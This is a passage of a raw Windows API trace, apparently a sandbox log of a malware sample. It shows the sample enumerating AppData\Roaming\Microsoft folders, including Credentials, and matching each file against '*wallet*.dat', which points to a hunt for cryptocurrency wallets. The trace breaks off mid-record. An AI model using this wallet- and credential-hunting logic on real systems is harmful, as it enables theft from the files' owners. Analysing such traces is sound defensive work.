[0234.687] FindNextFileA (in: hFindFile=0x6e1be0, lpFindFileData=0x1970cc | out: lpFindFileData=0x1970cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80ea6d97, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80ea6d97, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5a638a82, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x48839, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="CHICAGO.XSL", cAlternateFileName="")) returned 1 [0234.687] StrCmpCA (pszStr1="CHICAGO.XSL", pszStr2=".") returned 21 [0234.687] StrCmpCA (pszStr1="CHICAGO.XSL", pszStr2="..") returned 21 [0234.687] wsprintfA (in: param_1=0x196ebc, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\CHICAGO.XSL") returned 78 [0234.687] StrCmpCA (pszStr1="Microsoft\\Bibliography\\Style", pszStr2="") returned 77 [0234.687] wsprintfA (in: param_1=0x196fc4, param_2="%s\\%s" | out: param_1="Microsoft\\Bibliography\\Style\\CHICAGO.XSL") returned 40 [0234.687] PathMatchSpecA (pszFile="CHICAGO.XSL", pszSpec="*wallet*.dat") returned 0 [0234.687] wsprintfA (in: param_1=0x196b8c, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\CHICAGO.XSL\\*") returned 80 [0234.687] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\CHICAGO.XSL\\*", lpFindFileData=0x196a44 | out: lpFindFileData=0x196a44*(dwFileAttributes=0x80ea6d97, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x80ea6d97, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x5a638a82, ftLastWriteTime.dwLowDateTime=0x1d705ed, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x48839, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x480043, cFileName="I", cAlternateFileName="C")) returned 0xffffffff [0234.687] FindNextFileA (in: hFindFile=0x6e1be0, lpFindFileData=0x1970cc | out: lpFindFileData=0x1970cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80eabbab, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80eabbab, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5a6d16e8, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x4197e, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="GB.XSL", cAlternateFileName="")) returned 1 [0234.687] StrCmpCA (pszStr1="GB.XSL", pszStr2=".") returned 25 [0234.687] StrCmpCA (pszStr1="GB.XSL", pszStr2="..") returned 25 [0234.687] wsprintfA (in: param_1=0x196ebc, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GB.XSL") returned 73 [0234.687] StrCmpCA (pszStr1="Microsoft\\Bibliography\\Style", pszStr2="") returned 77 [0234.687] wsprintfA (in: param_1=0x196fc4, param_2="%s\\%s" | out: param_1="Microsoft\\Bibliography\\Style\\GB.XSL") returned 35 [0234.687] PathMatchSpecA (pszFile="GB.XSL", pszSpec="*wallet*.dat") returned 0 [0234.687] wsprintfA (in: param_1=0x196b8c, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GB.XSL\\*") returned 75 [0234.688] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GB.XSL\\*", lpFindFileData=0x196a44 | out: lpFindFileData=0x196a44*(dwFileAttributes=0x80eabbab, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x80eabbab, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x5a6d16e8, ftLastWriteTime.dwLowDateTime=0x1d705ed, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x4197e, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x420047, cFileName=".", cAlternateFileName="C")) returned 0xffffffff [0234.688] FindNextFileA (in: hFindFile=0x6e1be0, lpFindFileData=0x1970cc | out: lpFindFileData=0x1970cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80eaf650, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80eaf650, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5a638a82, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x3e966, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="GostName.XSL", cAlternateFileName="")) returned 1 [0234.688] StrCmpCA (pszStr1="GostName.XSL", pszStr2=".") returned 25 [0234.688] StrCmpCA (pszStr1="GostName.XSL", pszStr2="..") returned 25 [0234.688] wsprintfA (in: param_1=0x196ebc, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostName.XSL") returned 79 [0234.688] StrCmpCA (pszStr1="Microsoft\\Bibliography\\Style", pszStr2="") returned 77 [0234.688] wsprintfA (in: param_1=0x196fc4, param_2="%s\\%s" | out: param_1="Microsoft\\Bibliography\\Style\\GostName.XSL") returned 41 [0234.688] PathMatchSpecA (pszFile="GostName.XSL", pszSpec="*wallet*.dat") returned 0 [0234.688] wsprintfA (in: param_1=0x196b8c, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostName.XSL\\*") returned 81 [0234.688] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostName.XSL\\*", lpFindFileData=0x196a44 | out: lpFindFileData=0x196a44*(dwFileAttributes=0x80eaf650, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x80eaf650, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x5a638a82, ftLastWriteTime.dwLowDateTime=0x1d705ed, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x3e966, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x6f0047, cFileName="s", cAlternateFileName="C")) returned 0xffffffff [0234.689] FindNextFileA (in: hFindFile=0x6e1be0, lpFindFileData=0x1970cc | out: lpFindFileData=0x1970cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80eb319b, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80eb319b, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5a638a82, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x3d639, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="GostTitle.XSL", cAlternateFileName="GOSTTI~1.XSL")) returned 1 [0234.689] StrCmpCA (pszStr1="GostTitle.XSL", pszStr2=".") returned 25 [0234.689] StrCmpCA (pszStr1="GostTitle.XSL", pszStr2="..") returned 25 [0234.689] wsprintfA (in: param_1=0x196ebc, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostTitle.XSL") returned 80 [0234.689] StrCmpCA (pszStr1="Microsoft\\Bibliography\\Style", pszStr2="") returned 77 [0234.689] wsprintfA (in: param_1=0x196fc4, param_2="%s\\%s" | out: param_1="Microsoft\\Bibliography\\Style\\GostTitle.XSL") returned 42 [0234.689] PathMatchSpecA (pszFile="GostTitle.XSL", pszSpec="*wallet*.dat") returned 0 [0234.689] wsprintfA (in: param_1=0x196b8c, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostTitle.XSL\\*") returned 82 [0234.689] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostTitle.XSL\\*", lpFindFileData=0x196a44 | out: lpFindFileData=0x196a44*(dwFileAttributes=0x80eb319b, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x80eb319b, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x5a638a82, ftLastWriteTime.dwLowDateTime=0x1d705ed, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x3d639, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x6f0047, cFileName="s", cAlternateFileName="C")) returned 0xffffffff [0234.689] FindNextFileA (in: hFindFile=0x6e1be0, lpFindFileData=0x1970cc | out: lpFindFileData=0x1970cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80eb804f, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80eb804f, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5a7ecfbc, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x45882, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="HarvardAnglia2008OfficeOnline.xsl", cAlternateFileName="HARVAR~1.XSL")) returned 1 [0234.689] StrCmpCA (pszStr1="HarvardAnglia2008OfficeOnline.xsl", pszStr2=".") returned 26 [0234.689] StrCmpCA (pszStr1="HarvardAnglia2008OfficeOnline.xsl", pszStr2="..") returned 26 [0234.689] wsprintfA (in: param_1=0x196ebc, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\HarvardAnglia2008OfficeOnline.xsl") returned 100 [0234.689] StrCmpCA (pszStr1="Microsoft\\Bibliography\\Style", pszStr2="") returned 77 [0234.689] wsprintfA (in: param_1=0x196fc4, param_2="%s\\%s" | out: param_1="Microsoft\\Bibliography\\Style\\HarvardAnglia2008OfficeOnline.xsl") returned 62 [0234.689] PathMatchSpecA (pszFile="HarvardAnglia2008OfficeOnline.xsl", pszSpec="*wallet*.dat") returned 0 [0234.689] wsprintfA (in: param_1=0x196b8c, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\HarvardAnglia2008OfficeOnline.xsl\\*") returned 102 [0234.689] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\HarvardAnglia2008OfficeOnline.xsl\\*", lpFindFileData=0x196a44 | out: lpFindFileData=0x196a44*(dwFileAttributes=0x80eb804f, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x80eb804f, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x5a7ecfbc, ftLastWriteTime.dwLowDateTime=0x1d705ed, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x45882, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x610048, cFileName="r", cAlternateFileName="C")) returned 0xffffffff [0234.690] FindNextFileA (in: hFindFile=0x6e1be0, lpFindFileData=0x1970cc | out: lpFindFileData=0x1970cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80ebb9a1, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80ebb9a1, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5afed704, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x47e7d, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="IEEE2006OfficeOnline.xsl", cAlternateFileName="IEEE20~1.XSL")) returned 1 [0234.690] StrCmpCA (pszStr1="IEEE2006OfficeOnline.xsl", pszStr2=".") returned 27 [0234.690] StrCmpCA (pszStr1="IEEE2006OfficeOnline.xsl", pszStr2="..") returned 27 [0234.690] wsprintfA (in: param_1=0x196ebc, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\IEEE2006OfficeOnline.xsl") returned 91 [0234.690] StrCmpCA (pszStr1="Microsoft\\Bibliography\\Style", pszStr2="") returned 77 [0234.690] wsprintfA (in: param_1=0x196fc4, param_2="%s\\%s" | out: param_1="Microsoft\\Bibliography\\Style\\IEEE2006OfficeOnline.xsl") returned 53 [0234.690] PathMatchSpecA (pszFile="IEEE2006OfficeOnline.xsl", pszSpec="*wallet*.dat") returned 0 [0234.690] wsprintfA (in: param_1=0x196b8c, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\IEEE2006OfficeOnline.xsl\\*") returned 93 [0234.690] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\IEEE2006OfficeOnline.xsl\\*", lpFindFileData=0x196a44 | out: lpFindFileData=0x196a44*(dwFileAttributes=0x80ebb9a1, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x80ebb9a1, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x5afed704, ftLastWriteTime.dwLowDateTime=0x1d705ed, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x47e7d, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x450049, cFileName="E", cAlternateFileName="C")) returned 0xffffffff [0234.690] FindNextFileA (in: hFindFile=0x6e1be0, lpFindFileData=0x1970cc | out: lpFindFileData=0x1970cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80ec07b6, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80ec07b6, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5afed704, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x42132, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="ISO690.XSL", cAlternateFileName="")) returned 1 [0234.690] StrCmpCA (pszStr1="ISO690.XSL", pszStr2=".") returned 27 [0234.690] StrCmpCA (pszStr1="ISO690.XSL", pszStr2="..") returned 27 [0234.690] wsprintfA (in: param_1=0x196ebc, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690.XSL") returned 77 [0234.690] StrCmpCA (pszStr1="Microsoft\\Bibliography\\Style", pszStr2="") returned 77 [0234.690] wsprintfA (in: param_1=0x196fc4, param_2="%s\\%s" | out: param_1="Microsoft\\Bibliography\\Style\\ISO690.XSL") returned 39 [0234.690] PathMatchSpecA (pszFile="ISO690.XSL", pszSpec="*wallet*.dat") returned 0 [0234.691] wsprintfA (in: param_1=0x196b8c, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690.XSL\\*") returned 79 [0234.691] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690.XSL\\*", lpFindFileData=0x196a44 | out: lpFindFileData=0x196a44*(dwFileAttributes=0x80ec07b6, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x80ec07b6, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x5afed704, ftLastWriteTime.dwLowDateTime=0x1d705ed, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x42132, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x530049, cFileName="O", cAlternateFileName="C")) returned 0xffffffff [0234.691] FindNextFileA (in: hFindFile=0x6e1be0, lpFindFileData=0x1970cc | out: lpFindFileData=0x1970cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80ec4265, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80ec4265, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5afed704, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x351ea, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="ISO690Nmerical.XSL", cAlternateFileName="ISO690~1.XSL")) returned 1 [0234.691] StrCmpCA (pszStr1="ISO690Nmerical.XSL", pszStr2=".") returned 27 [0234.691] StrCmpCA (pszStr1="ISO690Nmerical.XSL", pszStr2="..") returned 27 [0234.691] wsprintfA (in: param_1=0x196ebc, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690Nmerical.XSL") returned 85 [0234.691] StrCmpCA (pszStr1="Microsoft\\Bibliography\\Style", pszStr2="") returned 77 [0234.691] wsprintfA (in: param_1=0x196fc4, param_2="%s\\%s" | out: param_1="Microsoft\\Bibliography\\Style\\ISO690Nmerical.XSL") returned 47 [0234.691] PathMatchSpecA (pszFile="ISO690Nmerical.XSL", pszSpec="*wallet*.dat") returned 0 [0234.691] wsprintfA (in: param_1=0x196b8c, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690Nmerical.XSL\\*") returned 87 [0234.691] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690Nmerical.XSL\\*", lpFindFileData=0x196a44 | out: lpFindFileData=0x196a44*(dwFileAttributes=0x80ec4265, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x80ec4265, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x5afed704, ftLastWriteTime.dwLowDateTime=0x1d705ed, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x351ea, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x530049, cFileName="O", cAlternateFileName="C")) returned 0xffffffff [0234.691] FindNextFileA (in: hFindFile=0x6e1be0, lpFindFileData=0x1970cc | out: lpFindFileData=0x1970cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80ecb8b4, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80ecb8b4, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5afed704, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x3e4f3, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="MLASeventhEditionOfficeOnline.xsl", cAlternateFileName="MLASEV~1.XSL")) returned 1 [0234.691] StrCmpCA (pszStr1="MLASeventhEditionOfficeOnline.xsl", pszStr2=".") returned 31 [0234.691] StrCmpCA (pszStr1="MLASeventhEditionOfficeOnline.xsl", pszStr2="..") returned 31 [0234.692] wsprintfA (in: param_1=0x196ebc, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\MLASeventhEditionOfficeOnline.xsl") returned 100 [0234.692] StrCmpCA (pszStr1="Microsoft\\Bibliography\\Style", pszStr2="") returned 77 [0234.692] wsprintfA (in: param_1=0x196fc4, param_2="%s\\%s" | out: param_1="Microsoft\\Bibliography\\Style\\MLASeventhEditionOfficeOnline.xsl") returned 62 [0234.692] PathMatchSpecA (pszFile="MLASeventhEditionOfficeOnline.xsl", pszSpec="*wallet*.dat") returned 0 [0234.692] wsprintfA (in: param_1=0x196b8c, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\MLASeventhEditionOfficeOnline.xsl\\*") returned 102 [0234.692] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\MLASeventhEditionOfficeOnline.xsl\\*", lpFindFileData=0x196a44 | out: lpFindFileData=0x196a44*(dwFileAttributes=0x80ecb8b4, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x80ecb8b4, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x5afed704, ftLastWriteTime.dwLowDateTime=0x1d705ed, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x3e4f3, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x4c004d, cFileName="A", cAlternateFileName="C")) returned 0xffffffff [0234.692] FindNextFileA (in: hFindFile=0x6e1be0, lpFindFileData=0x1970cc | out: lpFindFileData=0x1970cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80ed06d2, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80ed06d2, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5b432832, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x3d5c8, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="SIST02.XSL", cAlternateFileName="")) returned 1 [0234.692] StrCmpCA (pszStr1="SIST02.XSL", pszStr2=".") returned 37 [0234.692] StrCmpCA (pszStr1="SIST02.XSL", pszStr2="..") returned 37 [0234.692] wsprintfA (in: param_1=0x196ebc, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\SIST02.XSL") returned 77 [0234.692] StrCmpCA (pszStr1="Microsoft\\Bibliography\\Style", pszStr2="") returned 77 [0234.692] wsprintfA (in: param_1=0x196fc4, param_2="%s\\%s" | out: param_1="Microsoft\\Bibliography\\Style\\SIST02.XSL") returned 39 [0234.692] PathMatchSpecA (pszFile="SIST02.XSL", pszSpec="*wallet*.dat") returned 0 [0234.692] wsprintfA (in: param_1=0x196b8c, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\SIST02.XSL\\*") returned 79 [0234.692] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\SIST02.XSL\\*", lpFindFileData=0x196a44 | out: lpFindFileData=0x196a44*(dwFileAttributes=0x80ed06d2, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x80ed06d2, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x5b432832, ftLastWriteTime.dwLowDateTime=0x1d705ed, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x3d5c8, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x490053, cFileName="S", cAlternateFileName="C")) returned 0xffffffff [0234.692] FindNextFileA (in: hFindFile=0x6e1be0, lpFindFileData=0x1970cc | out: lpFindFileData=0x1970cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80ed2ca5, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80ed2ca5, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5b500917, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x54256, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TURABIAN.XSL", cAlternateFileName="")) returned 1 [0234.692] StrCmpCA (pszStr1="TURABIAN.XSL", pszStr2=".") returned 38 [0234.692] StrCmpCA (pszStr1="TURABIAN.XSL", pszStr2="..") returned 38 [0234.693] wsprintfA (in: param_1=0x196ebc, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\TURABIAN.XSL") returned 79 [0234.693] StrCmpCA (pszStr1="Microsoft\\Bibliography\\Style", pszStr2="") returned 77 [0234.693] wsprintfA (in: param_1=0x196fc4, param_2="%s\\%s" | out: param_1="Microsoft\\Bibliography\\Style\\TURABIAN.XSL") returned 41 [0234.693] PathMatchSpecA (pszFile="TURABIAN.XSL", pszSpec="*wallet*.dat") returned 0 [0234.693] wsprintfA (in: param_1=0x196b8c, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\TURABIAN.XSL\\*") returned 81 [0234.693] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\TURABIAN.XSL\\*", lpFindFileData=0x196a44 | out: lpFindFileData=0x196a44*(dwFileAttributes=0x80ed2ca5, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x80ed2ca5, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x5b500917, ftLastWriteTime.dwLowDateTime=0x1d705ed, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x54256, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x550054, cFileName="R", cAlternateFileName="C")) returned 0xffffffff [0234.693] FindNextFileA (in: hFindFile=0x6e1be0, lpFindFileData=0x1970cc | out: lpFindFileData=0x1970cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80ed2ca5, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80ed2ca5, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5b500917, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x54256, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TURABIAN.XSL", cAlternateFileName="")) returned 0 [0234.693] FindClose (in: hFindFile=0x6e1be0 | out: hFindFile=0x6e1be0) returned 1 [0234.694] FindNextFileA (in: hFindFile=0x6e1820, lpFindFileData=0x197754 | out: lpFindFileData=0x197754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80e9aa3d, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80e9aa3d, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x80e9aa3d, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2000002, dwReserved1=0x6b0260, cFileName="Style", cAlternateFileName="")) returned 0 [0234.694] FindClose (in: hFindFile=0x6e1820 | out: hFindFile=0x6e1820) returned 1 [0234.694] FindNextFileA (in: hFindFile=0x6e1660, lpFindFileData=0x197ddc | out: lpFindFileData=0x197ddc*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44687ae6, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x44687ae6, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2000002, cFileName="Credentials", cAlternateFileName="CREDEN~1")) returned 1 [0234.694] StrCmpCA (pszStr1="Credentials", pszStr2=".") returned 21 [0234.695] StrCmpCA (pszStr1="Credentials", pszStr2="..") returned 21 [0234.695] wsprintfA (in: param_1=0x197bcc, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Credentials") returned 59 [0234.695] StrCmpCA (pszStr1="Microsoft", pszStr2="") returned 77 [0234.695] wsprintfA (in: param_1=0x197cd4, param_2="%s\\%s" | out: param_1="Microsoft\\Credentials") returned 21 [0234.695] PathMatchSpecA (pszFile="Credentials", pszSpec="*wallet*.dat") returned 0 [0234.695] wsprintfA (in: param_1=0x19789c, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Credentials\\*") returned 61 [0234.695] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Credentials\\*", lpFindFileData=0x197754 | out: lpFindFileData=0x197754*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44687ae6, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x44687ae6, 